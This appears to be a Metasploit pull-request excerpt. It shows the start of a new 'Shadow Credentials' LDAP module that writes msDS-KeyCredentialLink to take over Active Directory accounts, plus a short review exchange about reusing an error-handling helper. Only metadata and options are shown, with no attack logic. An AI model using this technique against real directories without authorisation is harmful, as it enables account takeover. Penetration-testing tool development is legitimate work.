modules/auxiliary/admin/ldap/shadow_credentials.rb

```diff
@@ -0,0 +1,311 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::LDAP
+  include Msf::Auxiliary::Report
+
+  ATTRIBUTE = 'msDS-KeyCredentialLink'.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Shadow Credentials',
+        'Description' => %q{
+          This module can read and write the necessary LDAP attributes to configure a particular account with a
+          Key Credential Link. This allows weaponising write access to a user account by adding a certificate
+          that can subsequently be used to authenticate. In order for this to succeed, the authenticated user
+          must have write access to the target object (the object specified in TARGET_USER).
+        },
+        'Author' => [
+          'Elad Shamir', # Original research
+          'smashery' # module author
+        ],
+        'References' => [
+          ['URL', 'https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab'],
+          ['URL', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials']
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          ['FLUSH', { 'Description' => 'Delete all certificate entries' }],
+          ['LIST', { 'Description' => 'Read all credentials associated with the account' }],
+          ['REMOVE', { 'Description' => 'Remove matching certificate entries from the account object' }],
+          ['ADD', { 'Description' => 'Add a credential to the account' }]
+        ],
+        'DefaultAction' => 'LIST',
+        'Notes' => {
+          'Stability' => [],
+          'SideEffects' => [CONFIG_CHANGES], # REMOVE, FLUSH, ADD all make changes
+          'Reliability' => []
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGET_USER', [ true, 'The target to write to' ]),
+      OptString.new('DEVICE_ID', [ false, 'The specific certificate ID to operate on' ], conditions: %w[ACTION == REMOVE]),
+    ])
+
+    # Default authentication will be basic auth, which won't work on Windows LDAP servers; so overwrite default to NTLM
+    register_advanced_options(
+      [
+        OptEnum.new('LDAP::Auth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::NTLM, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),
+      ]
+    )
+  end
+
+  def fail_with_ldap_error(message)
```

Comment:
This looks like it has a lot of overlap with `#validate_query_result!` from here https://github.com/rapid7/metasploit-framework/blob/e184f5e708e6332152ff53a9fb865825f65b33e4/lib/msf/core/exploit/remote/ldap.rb#L273

Would it be possible to use that function instead?

Reply:
Yep, good call. I've just overridden the one I wanted to give a more specific error message for.